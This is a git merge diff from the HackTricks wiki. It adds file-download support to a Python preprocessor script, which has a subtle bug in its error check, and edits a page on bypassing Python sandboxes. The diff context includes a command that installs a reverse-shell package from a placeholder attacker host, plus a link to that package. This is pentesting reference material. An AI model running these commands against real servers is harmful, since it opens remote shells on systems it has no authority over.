Merge pull request #994 from HackTricks-wiki/support-file-downloads

support file downloads + remove some unused files

Author: carlospolop

hacktricks-preprocessor.py

@@ -1,4 +1,5 @@
 import json
+import os
 import sys
 import re
 import logging
@@ -68,6 +69,33 @@ def ref(matchobj):
 
     return result
 
+def files(matchobj):
+    logger.debug(f'Files match: {matchobj.groups(0)[0].strip()}')
+    href =  matchobj.groups(0)[0].strip()
+    title = ""
+
+    try:
+        for root, dirs, files in os.walk(os.getcwd()+'/src/files'):
+            if href in files:
+                title = href
+                logger.debug(f'File search result: {os.path.join(root, href)}')
+        
+    except Exception as e:
+        logger.debug(e)
+        logger.debug(f'Error searching file: {href}')
+        print(f'Error searching file: {href}')
+        sys.exit(1)
+
+        if title=="":
+            logger.debug(f'Error searching file: {href}')
+            print(f'Error searching file: {href}')
+            sys.exit(1)
+
+    template = f"""<a class="content_ref" href="/files/{href}"><span class="content_ref_label">{title}</span></a>"""
+
+    result = template
+
+    return result
 
 def add_read_time(content):
     regex = r'(<\/style>\n# .*(?=\n))'
@@ -105,6 +133,8 @@ def iterate_chapters(sections):
         current_chapter = chapter
         regex = r'{{[\s]*#ref[\s]*}}(?:\n)?([^\\\n]*)(?:\n)?{{[\s]*#endref[\s]*}}'
         new_content = re.sub(regex, ref, chapter['content'])
+        regex = r'{{[\s]*#file[\s]*}}(?:\n)?([^\\\n]*)(?:\n)?{{[\s]*#endfile[\s]*}}'
+        new_content = re.sub(regex, files, chapter['content'])
         new_content = add_read_time(new_content)
         chapter['content'] = new_content
 

src/images/CTX_WSUSpect_White_Paper (1).pdf renamed to src/files/CTX_WSUSpect_White_Paper (1).pdf

@@ -2,7 +2,6 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-
 These are some tricks to bypass python sandbox protections and execute arbitrary commands.
 
 ## Command Execution Libraries
@@ -44,8 +43,7 @@ system('ls')
 
 Remember that the _**open**_ and _**read**_ functions can be useful to **read files** inside the python sandbox and to **write some code** that you could **execute** to **bypass** the sandbox.
 
-> [!CAUTION]
-> **Python2 input()** function allows executing python code before the program crashes.
+> [!CAUTION] > **Python2 input()** function allows executing python code before the program crashes.
 
 Python try to **load libraries from the current directory first** (the following command will print where is python loading modules from): `python3 -c 'import sys; print(sys.path)'`
 
@@ -87,7 +85,9 @@ pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])
 
 You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**:
 
-{% file src="../../../images/Reverse.tar (1).gz" %}
+{{#file}}
+Reverse.tar (1).gz
+{{#endfile}}
 
 > [!NOTE]
 > This package is called `Reverse`. However, it was specially crafted so that when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave.
@@ -1145,8 +1145,4 @@ will be bypassed
 - [https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html](https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html)
 - [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6)
 
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-